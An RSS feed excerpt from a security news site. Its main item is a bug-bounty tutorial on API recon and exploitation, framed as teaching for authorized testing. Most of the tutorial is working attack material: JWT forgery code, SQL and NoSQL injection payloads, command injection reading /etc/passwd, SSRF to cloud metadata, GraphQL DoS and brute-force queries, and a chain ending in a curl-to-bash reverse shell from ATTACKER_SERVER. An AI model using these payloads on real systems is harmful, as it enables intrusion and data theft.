<li>Add command builder with escaped user input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3817973099" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5982" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5982/hovercard" href="https://github.com/microsoft/winget-cli/pull/5982">#5982</a></li>
<li>Add missing closing brace in settings.export.schema.0.1.json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DuckDuckStudio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DuckDuckStudio">@DuckDuckStudio</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3853198617" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6004" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6004/hovercard" href="https://github.com/microsoft/winget-cli/pull/6004">#6004</a></li>
<li>Turn off PWSH UT build in Fuzzing and ReleaseStatic for all platforms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857311162" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6005" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6005/hovercard" href="https://github.com/microsoft/winget-cli/pull/6005">#6005</a></li>
<li>Remove experimental feature gate on source edit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857921476" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6006" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6006/hovercard" href="https://github.com/microsoft/winget-cli/pull/6006">#6006</a></li>
<li>Update ReleaseNotes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862674095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6007" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6007/hovercard" href="https://github.com/microsoft/winget-cli/pull/6007">#6007</a></li>
<li>Make list details stable (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3889711357" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6021" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6021/hovercard" href="https://github.com/microsoft/winget-cli/pull/6021">#6021</a></li>
<li>Move to IReference rather than custom enum for optional bool (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893659251" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6024" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6024/hovercard" href="https://github.com/microsoft/winget-cli/pull/6024">#6024</a></li>
<li>Apply latest localization patch (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893720482" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6025" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6025/hovercard" href="https://github.com/microsoft/winget-cli/pull/6025">#6025</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohiuddin-khan-shiam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohiuddin-khan-shiam">@mohiuddin-khan-shiam</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186146724" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5564" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5564/hovercard" href="https://github.com/microsoft/winget-cli/pull/5564">#5564</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doterik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doterik">@doterik</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725749076" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5924" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5924/hovercard" href="https://github.com/microsoft/winget-cli/pull/5924">#5924</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.11.400...v1.28.240"><tt>v1.11.400...v1.28.240</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mastery Hunt: Hidden API Endpoints — A Deep Dive into API Bug Bounty Recon & Exploitation]]></title>
<description><![CDATA[API security testing is the crown jewel of modern bug bounty hunting. While front-end vulnerabilities still exist, APIs are where the real treasure lies — sensitive data, privileged operations, and business logic flaws. This writeup covers the complete lifecycle of discovering, analyzing, and exp...]]></description>
<link>https://tsecurity.de/de/3600902/hacking/mastery-hunt-hidden-api-endpoints-a-deep-dive-into-api-bug-bounty-recon-exploitation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600902/hacking/mastery-hunt-hidden-api-endpoints-a-deep-dive-into-api-bug-bounty-recon-exploitation/</guid>
<pubDate>Tue, 16 Jun 2026 09:09:18 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>API security testing is the crown jewel of modern bug bounty hunting. While front-end vulnerabilities still exist, APIs are where the real treasure lies — sensitive data, privileged operations, and business logic flaws. This writeup covers the complete lifecycle of discovering, analyzing, and exploiting hidden API endpoints for bug bounty and authorized penetration testing.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DEt2mha_sAbLIoOsiNBDxA.png"><figcaption>Hidden API Endpoints</figcaption></figure><h3>Phase 1: Surface Reconnaissance — Finding the Attack Surface</h3><h3>1.1 Passive Reconnaissance</h3><p>Before sending a single request, build a map of the target’s API surface using passive techniques.</p><p><strong>Wayback Machine &amp; Archive Analysis</strong></p><pre># Using gau (GetAllUrls) — passive URL gathering<br>gau --subs target.com | grep -E "\.json|\.xml|/api/|/v[0-9]/|/graphql|/rest/|/swagger|/docs" &gt; api_endpoints.txt<br><br># Waybackurls via waymore<br>waymore -i target.com -mode U -o U | grep -i api</pre><p><strong>Google Dorking for Exposed APIs</strong></p><pre>site:target.com inurl:"/api/"<br>site:target.com inurl:"/v1/" | inurl:"/v2/" | inurl:"/v3/"<br>site:target.com intitle:"Swagger UI" | intitle:"API Documentation"<br>site:target.com intitle:"index of" "api"<br>site:target.com ext:json "swagger" | ext:yaml "openapi"<br>site:target.com "api_key" | "api-key" | "apikey" filetype:txt</pre><p><strong>Certificate Transparency Logs</strong></p><pre># crt.sh — find subdomains with API-related names<br>curl -s "https://crt.sh/?q=%25.target.com&amp;output=json" | jq -r '.[].name_value' | sort -u | grep -iE "api|dev|staging|internal|gateway|admin"</pre><p><strong>Mobile App Reverse Engineering</strong></p><p>Decompile the mobile APK/IPA to extract embedded API endpoints:</p><pre># Android<br>apktool d app.apk -o decompiled<br>grep -r "https\?://" decompiled/ --include="*.smali" --include="*.xml" | grep -i api<br><br># iOS (via objection)<br>objection --gadget "com.target.app" explore<br>android hooking list classes | grep -i "api\|network\|request"</pre><h3>1.2 Active Reconnaissance</h3><p>Subdomain Enumeration Focused on API Subdomains</p><pre># Subfinder + httpx<br>subfinder -d target.com -all -silent | httpx -silent -ports 80,443,8080,8443,9090,3000,5000 | tee live_subdomains.txt<br><br># Filter for API-related subdomains<br>cat live_subdomains.txt | grep -iE "api|gateway|backend|internal|admin|dev|staging|uat|sandbox|edge|cdn"</pre><p><strong>Directory/Endpoint Bruteforcing</strong></p><p>Use specialized wordlists for API endpoints:</p><pre># Common API paths<br>ffuf -u https://api.target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common-api-endpoints.txt -mc all -fs 0 -fc 404<br><br># GraphQL discovery<br>ffuf -u https://api.target.com/FUZZ -w &lt;(echo -e "graphql\ngraph\ngraphiql\nv1/graphql\nv2/graphql\napi/graphql\nquery\nmutations") -mc 200,301,302,403<br><br># Swagger/OpenAPI docs<br>ffuf -u https://api.target.com/FUZZ -w &lt;(echo -e "swagger.json\nswagger.yaml\napi-docs\nopenapi.json\nopenapi.yaml\ndocs\nv2/swagger.json\nv3/api-docs")</pre><p><strong>Parameter Discovery</strong></p><p>Hidden parameters can unlock undocumented functionality:</p><pre># Arjun — parameter discovery<br>arjun -u https://api.target.com/v1/users --get<br><br># Paramspider<br>paramspider -d target.com --subs --exclude woff,css,js,png,svg,jpg</pre><h3>Phase 2: API Fingerprinting &amp; Documentation Extraction</h3><h3>2.1 Identify API Type &amp; Protocol</h3><p>Send probe requests to identify the API technology:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/735/1*f3eYKwXZd0A_I2cYYEw0xA.png"><figcaption>Identify API Type &amp; Protocol</figcaption></figure><h3>2.2 Extract Full API Documentation</h3><p><strong>Swagger/OpenAPI Endpoints</strong></p><p>Common paths to check:</p><pre>/api/swagger.json<br>/api/swagger.yaml<br>/api/v1/swagger.json<br>/api/v2/swagger.json<br>/swagger-resources<br>/swagger-ui.html<br>/api-docs<br>/v2/api-docs<br>/v3/api-docs<br>/openapi.json<br>/docs<br>/redoc</pre><p>Once found, parse it:</p><pre># Download and parse<br>curl -s https://api.target.com/swagger.json | jq '.paths' | head -100<br><br># Convert to Postman collection for testing<br>curl -s https://api.target.com/swagger.json | npx swagger-to-postman &gt; collection.json</pre><p><strong>GraphQL Introspection</strong></p><p>If GraphQL is detected, attempt introspection:</p><pre># Standard introspection query<br>query {<br>  __schema {<br>    types {<br>      name<br>      fields {<br>        name<br>        type {<br>          name<br>          kind<br>        }<br>      }<br>    }<br>    queryType {<br>      fields {<br>        name<br>        args {<br>          name<br>          type {<br>            name<br>          }<br>        }<br>      }<br>    }<br>    mutationType {<br>      fields {<br>        name<br>        args {<br>          name<br>          type {<br>            name<br>          }<br>        }<br>      }<br>    }<br>  }<br>}</pre><pre># Using InQL (Burp extension or standalone)<br>python3 inql -t https://api.target.com/graphql -d<br><br># Using graphw00f for fingerprinting<br>graphw00f -d https://api.target.com/graphql</pre><h3>2.3 HTTP Method Fuzzing</h3><p>Discover hidden endpoints by fuzzing HTTP methods on known endpoints:</p><pre># Fuzz all methods on discovered endpoints<br>for method in GET POST PUT PATCH DELETE OPTIONS HEAD TRACE CONNECT; do<br>  curl -X $method -s -o /dev/null -w "%{http_code}" https://api.target.com/v1/users<br>  echo " - $method"<br>done</pre><p><strong>Automated with ffuf:</strong></p><pre>ffuf -u https://api.target.com/v1/users \<br>  -X FUZZ \<br>  -w &lt;(echo -e "GET\nPOST\nPUT\nPATCH\nDELETE\nOPTIONS") \<br>  -mc all -fc 404,405,400</pre><h3>Phase 3: Authentication &amp; Authorization Bypass Techniques</h3><h3>3.1 Authentication Bypass Vectors</h3><p>Missing or Weak Auth on Hidden Endpoints</p><p>Hidden endpoints often lack proper authentication:</p><pre># Compare authenticated vs unauthenticated access<br>curl -s https://api.target.com/v1/admin/users -H "Authorization: Bearer $TOKEN"<br>curl -s https://api.target.com/v1/admin/users  # No token — what happens?</pre><p><strong>JWK Injection &amp; JWT Manipulation</strong></p><pre>#!/usr/bin/env python3<br>"""<br>JWT manipulation toolkit for API testing<br>"""<br>import jwt<br>import requests<br>import json<br><br># Technique 1: Set algorithm to 'none'<br>def jwt_none_bypass(token, payload):<br>    """Set alg to 'none' — works on poorly validated JWTs"""<br>    header = {"alg": "none", "typ": "JWT"}<br>    # Some implementations accept 'None' (capital N)<br>    # Try: none, None, NONE, nOnE<br>    forged = jwt.encode(payload, "", algorithm="none")<br>    return forged<br><br># Technique 2: RS256 → HS256 confusion<br>def jwt_alg_confusion(public_key_path, payload):<br>    """<br>    If the server uses RS256 but accepts HS256,<br>    sign with the PUBLIC key (which is known) as HMAC secret<br>    """<br>    with open(public_key_path, "r") as f:<br>        public_key = f.read()<br>    forged = jwt.encode(payload, public_key, algorithm="HS256")<br>    return forged<br><br># Technique 3: JWK injection (CVE-2018-0114)<br>def jwk_injection(payload, private_key):<br>    """<br>    Craft a JWT that includes a malicious JWK in the header.<br>    If the server trusts the embedded JWK, it validates against YOUR key.<br>    """<br>    # Use python-jwt toolkit or jwk-inject.py<br>    # Header: {"alg": "RS256", "jwk": {"kty": "RSA", "n": "...", "e": "AQAB"}}<br>    pass<br><br># Technique 4: Kid injection (directory traversal)<br>def kid_injection(payload):<br>    """<br>    kid: "../../dev/null" means empty signature validation<br>    kid: "/proc/sys/kernel/random/uuid" for DoS testing<br>    """<br>    header = {<br>        "alg": "HS256",<br>        "typ": "JWT",<br>        "kid": "../../dev/null"<br>    }<br>    forged = jwt.encode(payload, "", algorithm="HS256", headers=header)<br>    return forged</pre><p><strong>API Key Leakage via Referer/Origin</strong></p><pre># Check if API keys leak in referer headers<br>curl -s https://api.target.com/v1/endpoint \<br>  -H "Referer: https://api.target.com/v1/users?api_key=test123"</pre><h3>3.2 Authorization Testing — IDOR &amp; BOLA</h3><p>Insecure Direct Object Reference (IDOR) / Broken Object Level Authorization (BOLA)</p><pre># Sequential ID enumeration<br>for id in $(seq 1 100); do<br>  curl -s "https://api.target.com/v1/users/$id" | jq '.email'<br>done<br><br># UUID enumeration (less likely but test)<br>ffuf -u https://api.target.com/v1/orders/FUZZ \<br>  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -mc 200,403,401<br><br># Mass IDOR via parameter pollution<br>curl -s "https://api.target.com/v1/invoices?id=1&amp;id=2&amp;id=3"<br>curl -s "https://api.target.com/v1/invoices?id[]=1&amp;id[]=2&amp;id[]=3"</pre><p>Mass Assignment</p><pre># Test for mass assignment on POST/PUT endpoints<br>curl -X PUT https://api.target.com/v1/users/me \<br>  -H "Content-Type: application/json" \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -d '{<br>    "name": "test",<br>    "role": "admin",<br>    "is_admin": true,<br>    "balance": 999999999,<br>    "email_verified": true,<br>    "account_status": "active"<br>  }'</pre><p><strong>Broken Function Level Authorization (BFLA)</strong></p><p>Vertical privilege escalation — lower privilege user accessing admin functions:</p><pre># Replace user role token and test admin endpoints<br>curl -s https://api.target.com/v1/admin/users \<br>  -H "Authorization: Bearer $(cat low_priv_token.txt)"</pre><h3>Phase 4: Injection Attacks on APIs</h3><h3>4.1 SQL Injection in API Parameters</h3><p>APIs are just as vulnerable to SQLi as web apps, sometimes more so because of serialization handling:</p><pre># Classic SQLi in API<br>curl -s "https://api.target.com/v1/users?id=1' OR '1'='1"<br>curl -s "https://api.target.com/v1/users?id=1 UNION SELECT @@version"<br><br># JSON-based SQLi<br>curl -X POST https://api.target.com/v1/search \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "test' OR '1'='1"}'<br><br># NoSQL Injection (MongoDB)<br>curl -X POST https://api.target.com/v1/login \<br>  -H "Content-Type: application/json" \<br>  -d '{"username": "admin", "password": {"$ne": ""}}'</pre><h3>4.2 Command Injection</h3><pre># Command injection in API parameters<br>curl -s "https://api.target.com/v1/utils/ping?host=127.0.0.1;id"<br>curl -s "https://api.target.com/v1/exports?format=csv;cat /etc/passwd"<br><br># Blind command injection with out-of-band detection<br>curl -s "https://api.target.com/v1/convert?file=/tmp/test|curl http://COLLABORATOR.net/$(whoami)"</pre><h3>4.3 SSRF (Server-Side Request Forgery)</h3><p>APIs that fetch external URLs are goldmines for SSRF:</p><pre># Basic SSRF<br>curl -s "https://api.target.com/v1/proxy?url=http://169.254.169.254/latest/meta-data/"<br>curl -s "https://api.target.com/v1/avatar?url=http://127.0.0.1:8080/admin"<br><br># Blind SSRF via Collaborator<br>curl -s "https://api.target.com/v1/webhook?url=http://COLLABORATOR.net/test"<br><br># SSRF via cloud metadata endpoints<br>curl -s "https://api.target.com/v1/import?url=http://169.254.169.254/"  # AWS<br>curl -s "https://api.target.com/v1/import?url=http://metadata.google.internal/"  # GCP<br>curl -s "https://api.target.com/v1/import?url=http://100.100.100.200/latest/meta-data/"  # Alibaba</pre><h3>Phase 5: GraphQL-Specific Attacks</h3><h4>5.1 Introspection &amp; Schema Extraction</h4><pre># InQL scanner<br>inql -t https://api.target.com/graphql -d<br><br># Clairvoyance — introspection even when blocked<br>clairvoyance https://api.target.com/graphql -o schema.json</pre><h3>5.2 Batching &amp; Rate Limit Bypass</h3><pre># Batch login bruteforce — single request, many passwords<br>[<br>  {"query": "mutation { login(username: \"admin\", password: \"password1\") { token } }"},<br>  {"query": "mutation { login(username: \"admin\", password: \"password2\") { token } }"},<br>  {"query": "mutation { login(username: \"admin\", password: \"password3\") { token } }"},<br>  # ... 100+ more<br>]</pre><h3>5.3 Deep Query &amp; Nested Abuse</h3><pre># Circular query — cause DoS via deep nesting<br>query {<br>  user(id: 1) {<br>    posts {<br>      comments {<br>        user {<br>          posts {<br>            comments {<br>              user {<br>                posts {<br>                  comments {<br>                    user { name }<br>                  }<br>                }<br>              }<br>            }<br>          }<br>        }<br>      }<br>    }<br>  }<br>}</pre><h3>5.4 Field Duplication &amp; Resource Exhaustion</h3><pre>query {<br>  __typename<br>  __typename<br>  __typename<br>  __typename<br>  user(id: 1) {<br>    name<br>    name<br>    name<br>    email<br>    email<br>    email<br>    email<br>  }<br>}</pre><h3>Phase 6: Rate Limit Testing &amp; Business Logic Abuse</h3><h4>6.1 Rate Limit Bypass Techniques</h4><pre># Technique 1: Header manipulation<br>curl -s https://api.target.com/v1/forgot-password \<br>  -H "X-Forwarded-For: 127.0.0.1" \<br>  -H "X-Real-IP: 127.0.0.1" \<br>  -H "X-Originating-IP: 127.0.0.1" \<br>  -H "X-Remote-IP: 127.0.0.1" \<br>  -H "X-Client-IP: 127.0.0.1" \<br>  -H "Forwarded: for=127.0.0.1"<br><br># Technique 2: Method alternation<br># If POST is rate-limited, try PATCH or PUT<br>curl -X PATCH https://api.target.com/v1/forgot-password \<br>  -d '{"email":"victim@test.com"}'<br><br># Technique 3: Parameter pollution<br>curl -s "https://api.target.com/v1/forgot-password?email=test@test.com&amp;email=admin@admin.com"</pre><h3>6.2 Business Logic Flaws</h3><p>Race Conditions / TOCTOU</p><pre>#!/usr/bin/env python3<br>"""<br>Race condition testing — concurrent coupon redemption<br>"""<br>import requests<br>import threading<br><br>def redeem_coupon():<br>    r = requests.post("https://api.target.com/v1/coupons/redeem",<br>        json={"code": "ONETIME50"},<br>        headers={"Authorization": f"Bearer {TOKEN}"})<br>    print(f"Status: {r.status_code}, Response: {r.text}")<br><br># Fire 20 simultaneous requests<br>threads = [threading.Thread(target=redeem_coupon) for _ in range(20)]<br>for t in threads: t.start()<br>for t in threads: t.join()</pre><p><strong>Integer Overflow / Underflow</strong></p><pre># Negative numbers<br>curl -X POST https://api.target.com/v1/cart/add \<br>  -H "Content-Type: application/json" \<br>  -d '{"product_id": 1, "quantity": -100}'<br><br># Large numbers causing overflow<br>curl -X POST https://api.target.com/v1/transfer \<br>  -d '{"amount": 99999999999999999999, "to": "attacker"}'</pre><h3>Phase 7: Automation — Build Your API Recon Pipeline</h3><pre>#!/bin/bash<br># api-recon-pipeline.sh — full automated API recon<br># Usage: ./api-recon-pipeline.sh target.com<br><br>TARGET=$1<br>OUTDIR="api_recon_$TARGET"<br>mkdir -p $OUTDIR<br><br>echo "[*] Passive URL collection"<br>gau --subs $TARGET | tee $OUTDIR/gau_urls.txt<br>waybackurls $TARGET | tee -a $OUTDIR/wayback_urls.txt<br><br>echo "[*] Extract API endpoints"<br>cat $OUTDIR/*.txt | grep -iE "api|rest|graphql|swagger|v[0-9]" | sort -u &gt; $OUTDIR/api_endpoints.txt<br><br>echo "[*] Subdomain enumeration"<br>subfinder -d $TARGET -all -silent | httpx -silent -ports 80,443,8080,8443,3000,9090 &gt; $OUTDIR/live_subs.txt<br><br>echo "[*] Swagger/OpenAPI discovery"<br>ffuf -u https://FUZZ/$TARGET/swagger.json -w $OUTDIR/live_subs.txt -mc 200 -o $OUTDIR/swagger_found.json<br><br>echo "[*] Directory fuzzing on API endpoints"<br>while read endpoint; do<br>  ffuf -u $endpoint/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api-endpoints.txt -mc all -fc 404 -o $OUTDIR/ffuf_$(echo $endpoint | md5sum | cut -d' ' -f1).json<br>done &lt; $OUTDIR/api_endpoints.txt<br><br>echo "[*] Parameter fuzzing"<br>arjun -i $OUTDIR/api_endpoints.txt -o $OUTDIR/arjun_params.json<br><br>echo "[*] Done. Review files in $OUTDIR/"</pre><h3>Phase 8: Exploit Chaining — From Recon to Critical Finding</h3><h4>Chain Example: Blind SSRF → Internal Service Discovery → RCE</h4><p>Step 1: Find an endpoint that fetches URLs</p><pre># Avatar upload/profile image endpoint<br>curl -s "https://api.target.com/v1/profile/avatar?url=http://example.com/test.jpg"</pre><p>Step 2: Test for SSRF</p><pre>curl -s "https://api.target.com/v1/profile/avatar?url=http://127.0.0.1:8080/"<br># Response contains internal HTML → SSRF confirmed</pre><p>Step 3: Port scan internal network via SSRF</p><pre>for port in 80 443 3000 5000 6379 8080 8443 9200 27017; do<br>  status=$(curl -s -o /dev/null -w "%{http_code}" \<br>    "https://api.target.com/v1/profile/avatar?url=http://127.0.0.1:$port/")<br>  echo "Port $port: $status"<br>done</pre><p>Step 4: Discover internal admin panel</p><pre>curl -s "https://api.target.com/v1/profile/avatar?url=http://internal-admin.target.internal:8080/deploy?cmd=ls"<br># Returns directory listing of deployment server</pre><p>Step 5: Exploit for RCE</p><pre>curl -s "https://api.target.com/v1/profile/avatar?url=http://internal-admin.target.internal:8080/deploy?cmd=curl+http://ATTACKER_SERVER/shell.sh+|+bash"<br># Reverse shell established</pre><h3>Reporting &amp; Documentation Template</h3><pre># Vulnerability: [Title]<br><br>**Severity:** Critical / High / Medium / Low  <br>**CVSS Score:** X.X (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)  <br>**Endpoint:** `POST /api/v1/users/forgot-password`<br><br>## Description<br>[Clear description of the vulnerability and its impact]<br><br>## Steps to Reproduce<br>1. [Step 1]<br>2. [Step 2]<br>3. [Step 3]<br><br>## Proof of Concept<br>```bash<br># Exact curl command or script<br>curl -X POST https://api.target.com/v1/endpoint \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -d '{"payload": "test"}'</pre><h3>Impact</h3><p>[What can an attacker achieve? Data exposure? Account takeover? RCE?]</p><h3>Remediation</h3><ol><li>[Fix 1 — e.g., Implement proper authorization checks]</li><li>[Fix 2 — e.g., Validate and sanitize all user input]</li><li>[Fix 3 — e.g., Rate-limit sensitive endpoints]</li></ol><h3>References</h3><ul><li>OWASP API Security Top 10: API1:2023 — Broken Object Level Authorization</li><li>CWE-284: Improper Access Control</li></ul><h3>OWASP API Security Top 10 (2023) Quick Reference</h3><pre><br><br>| API# | Category | What to Test |<br>|---|---|---|<br>| API1:2023 | Broken Object Level Authorization | IDOR on any object reference |<br>| API2:2023 | Broken Authentication | JWT bypass, rate limits, password reset |<br>| API3:2023 | Broken Object Property Level Mapping | Mass assignment, extra fields |<br>| API4:2023 | Unrestricted Resource Consumption | DoS via deep pagination, batch queries |<br>| API5:2023 | Broken Function Level Authorization | Vertical privilege escalation |<br>| API6:2023 | Unrestricted Access to Sensitive Business Flows | Automated abuse (coupons, votes) |<br>| API7:2023 | Server Side Request Forgery | URL fetching endpoints |<br>| API8:2023 | Security Misconfiguration | CORS, error handling, default creds |<br>| API9:2023 | Improper Inventory Management | Old versions, staging endpoints |<br>| API10:2023 | Unsafe Consumption of APIs | API-to-API trust issues |<br><br>---<br><br>## Essential Tools Cheatsheet<br><br>| Tool | Purpose | Install |<br>|---|---|---|<br>| **gau** | Passive URL collection | `go install github.com/lc/gau/v2/cmd/gau@latest` |<br>| **httpx** | HTTP probing | `go install github.com/projectdiscovery/httpx/cmd/httpx@latest` |<br>| **ffuf** | Directory/parameter fuzzing | `go install github.com/ffuf/ffuf@latest` |<br>| **arjun** | Parameter discovery | `pip install arjun` |<br>| **inql** | GraphQL analysis (Burp) | BApp Store or `pip install inql` |<br>| **graphw00f** | GraphQL fingerprinting | `git clone https://github.com/dolevf/graphw00f` |<br>| **jwt_tool** | JWT manipulation | `pip install pyjwt jtool` |<br>| **waymore** | Wayback Machine scraper | `pip install waymore` |<br>| **subfinder** | Subdomain discovery | `go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest` |<br>| **nuclei** | Template-based scanning | `go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest` |<br><br>---<br><br>## Final Words<br><br>The key to winning at API bug bounty hunting is **systematic methodology** combined with **creative thinking**. Automated tools will find the low-hanging fruit, but the critical findings come from understanding the application's business logic and chaining seemingly innocuous issues together.<br><br>Remember:<br>- **Every undocumented endpoint is a potential bypass**<br>- **If it's not in the documentation, test it harder**<br>- **Authentication bypass on one endpoint means trying it on every endpoint**<br>- **Business logic &gt; technical complexity** for the highest bounties<br><br>Happy hunting. Stay authorized, stay methodical, and dig deeper than everyone else.</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/627/0*e8oUgphijh5YDW-O.png"><figcaption>Follow US</figcaption></figure><p><em>GitHub: </em><a href="https://github.com/SecurityTalent"><em>SecurityTalent</em></a><em> | Medium: </em><a href="https://medium.com/@securitytalent"><em>Security Talent</em></a><em> | Twitter: </em><a href="https://twitter.com/Securi3yTalent"><em>Securi3yTalent</em></a><em> </em>| Facebook: <a href="https://www.facebook.com/Securi3ytalent/">Securi3ytalent</a> | Telegram: <a href="https://t.me/Securi3yTalent">Securi3yTalent</a></p><p>#CyberSecurity #BugBounty #APISecurity #EthicalHacking #WebSecurity #InfoSec #BugBountyHunter #OWASP #PenTesting #APIHacking</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9cc1d14b8c96" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/mastery-hunt-hidden-api-endpoints-a-deep-dive-into-api-bug-bounty-recon-exploitation-9cc1d14b8c96">Mastery Hunt: Hidden API Endpoints — A Deep Dive into API Bug Bounty Recon &amp; Exploitation</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybersecurity jobs available right now: June 16, 2026]]></title>
<description><![CDATA[Android Vulnerability Researcher Byteria | USA | Remote – View job details As an Android Vulnerability Researcher, you will analyze the Android attack surface, including the Linux kernel, system services, drivers, firmware, applications, and Trusted Execution Environment (TEE). You will reverse e...]]></description>
<link>https://tsecurity.de/de/3600615/it-security-nachrichten/cybersecurity-jobs-available-right-now-june-16-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600615/it-security-nachrichten/cybersecurity-jobs-available-right-now-june-16-2026/</guid>
<pubDate>Tue, 16 Jun 2026 06:24:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Android Vulnerability Researcher Byteria | USA | Remote – View job details As an Android Vulnerability Researcher, you will analyze the Android attack surface, including the Linux kernel, system services, drivers, firmware, applications, and Trusted Execution Environment (TEE). You will reverse engineer native binaries and mobile software, identify vulnerabilities through code review, fuzzing, and static and dynamic analysis, and develop proof-of-concept exploits to validate findings. Application Security Engineer Millennium | Ireland | On-site – View … <a href="https://www.helpnetsecurity.com/2026/06/16/cybersecurity-jobs-available-right-now-june-16-2026/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/16/cybersecurity-jobs-available-right-now-june-16-2026/">Cybersecurity jobs available right now: June 16, 2026</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Users Cry Foul After AMD Stripped Memory Crypto From Its Consumer CPUs]]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: A decade ago, AMD added a protection to its high-end CPUs to protect them against cold boot attacks and other types of physical exploits that siphon sensitive data out of the connected memory chips. Short for Transparent Secure Memory Encrypt...]]></description>
<link>https://tsecurity.de/de/3600140/it-security-nachrichten/users-cry-foul-after-amd-stripped-memory-crypto-from-its-consumer-cpus/</link>
